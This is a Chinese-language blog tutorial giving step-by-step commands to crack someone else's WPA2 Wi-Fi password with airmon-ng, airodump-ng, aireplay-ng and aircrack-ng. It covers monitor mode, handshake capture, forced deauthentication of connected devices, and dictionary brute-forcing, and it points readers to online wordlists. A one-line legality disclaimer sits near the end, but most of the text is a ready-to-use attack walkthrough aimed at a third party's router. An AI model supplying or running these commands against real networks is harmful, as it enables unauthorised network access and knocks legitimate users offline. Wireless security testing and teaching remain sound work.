赞
踩
Ifconfig
需要买支持监听的外置网卡
一般能看到wlan0,这个就是外置网卡
airmon-ng start wlan0
Ifconfig
检查一下是否开启监听,如图显示就证明开启监听
airodump-ng wlan0mon
BSSID,CH,ESSID是之后会用到的
airodump-ng -c 11 --bssid 对方的地址(就是BSSID) -w hach wlan0mon
-c后面是第三步CH下面的数值
--bssid是对方的地址
-w是要存的抓包的文件名
如图就算抓包成功
大概率不可能正好有设备刚连接,这时候就要用下一步的方法把已连接的设备踢出。
如果抓包的时候STATION下面是空的,就说明没有设备连接这个路由器
将已连接的设备踢出,然后对方设备重连,这样才可以抓包成功
aireplay-ng -0 10 -a 自己的地址 -c 对方的地址 wlan0mon
10是攻击次数,可以根据需求增大
如果上面的命令之后显示“no such bssid available”
可以试一下加个-D
aireplay-ng -0 10 -a 自己的地址 -c 对方的地址 -D wlan0mon
aircrack-ng -a2 -b 对方路由器的地址 -w 字典的路径 抓包的文件
aircrack-ng -a2 -b 90:65:84:2E:0F:2C -w /usr/share/wordlists hach2*.cap
/usr/share/wordlists 这个kali自己的字典
跑包能成功取决于你的字典包含不包含密码,要是一个很全的密码字典,要跑的时间很长。
如图就是跑包成功,可以看到密码
请注意,在未经授权的情况下使用此类工具扫描他人的无线网络是不合法和不道德的行为,请确保仅在合法合规且获得授权的情况下使用。
欢迎一起讨论!
推荐一个字典网站
网上可以搜到好多现成的字典和生成工具
有关在使用aireplay-ng处理5Ghz频段的wifi时出现“No such Bssid available”的解决方法 - 锤子猫 - 博客园 (cnblogs.com)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。